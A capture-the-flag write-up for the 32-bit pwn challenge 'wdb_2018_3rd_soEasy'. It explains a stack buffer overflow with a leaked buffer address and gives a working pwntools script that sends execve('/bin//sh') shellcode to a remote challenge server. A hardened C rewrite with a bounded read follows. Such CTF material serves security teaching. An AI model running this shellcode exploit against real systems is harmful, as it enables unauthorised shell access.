wdb_2018_3rd_soEasy
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
32-bit with nothing enabled, ez.
Write shellcode and run it on the stack.
ssize_t vul()
{
    char buf[72]; // [esp+0h] [ebp-48h] BYREF
    printf("Hei,give you a gift->%p\n", buf);   // leaks buf's stack address
    puts("what do you want to do?");
    return read(0, buf, 0x64u);   // 0x64 = 100 bytes into a 72-byte buffer: overwrites saved ebp and the return address
}
It also hands us the stack address.
Write the shellcode, then return into the stack and it runs.
from pwn import *
from Yapack import *   # helper wrapper providing rec/ru/li/sl/ia (not part of pwntools)
context(os='linux', arch='i386', log_level='debug')
r, elf = rec("node4.buuoj.cn", 28383, "./pwn", 10)
ru(b'0x')
leak = int(r.recv(8), 16)   # buf address printed by the %p
li(leak)
# 21-byte i386 execve("/bin//sh", NULL, NULL) shellcode
pl = b'\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80'
# pad to 0x48 (end of buf), fake saved ebp, then return address = buf, where the shellcode sits
pl = pl.ljust(0x48, b'\x00') + p32(0) + p32(leak)
sl(pl)
ia()
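For contrast, a hardened vul() (an added example, not code from the writeup or the challenge binary): the read is bounded by sizeof(buf) and the %p leak is dropped, which removes both the overflow and the stack address the exploit relies on. bounded_read, bytes_past_return and feed_and_read are names invented for this example.

```c
#include <stdio.h>
#include <unistd.h>
/* Read at most cap-1 bytes from fd (handles short reads and EOF), NUL-terminate,
 * and return the count stored, or -1 on error. */
ssize_t bounded_read(int fd, char *buf, size_t cap)
{
    size_t total = 0;
    if (cap == 0) return -1;
    while (total < cap - 1) {
        ssize_t n = read(fd, buf + total, cap - 1 - total);
        if (n < 0) return -1;
        if (n == 0) break;                          /* EOF */
        total += (size_t)n;
    }
    buf[total] = '\0';
    return (ssize_t)total;
}

/* Hardened vul(): no "%p" leak of buf, and the read is bounded by the buffer,
 * so saved ebp (buf+72) and the return address (buf+76) stay out of reach. */
ssize_t vul_fixed(int fd)
{
    char buf[72];                               /* same frame as the original */
    puts("what do you want to do?");
    return bounded_read(fd, buf, sizeof(buf));  /* was read(0, buf, 0x64u) */
}

/* Bytes a read of read_len into a buf_len-byte i386 frame reaches past the
 * return address (4 saved ebp + 4 ret). Original 72 / 0x64: 20; fixed: 0. */
int bytes_past_return(size_t buf_len, size_t read_len)
{
    size_t frame_end = buf_len + 4 + 4;
    return read_len > frame_end ? (int)(read_len - frame_end) : 0;
}

/* Constructed test helper: push len copies of fill through a pipe into
 * vul_fixed and return how many bytes it accepted. */
ssize_t feed_and_read(char fill, size_t len)
{
    int fds[2];
    if (pipe(fds) != 0) return -1;
    for (size_t i = 0; i < len; i++)
        if (write(fds[1], &fill, 1) != 1)
            return -1;
    close(fds[1]);
    ssize_t got = vul_fixed(fds[0]);
    close(fds[0]);
    return got;
}
```

Feeding the original 100-byte payload length through vul_fixed yields 71 accepted bytes, none of which can reach the frame's saved registers.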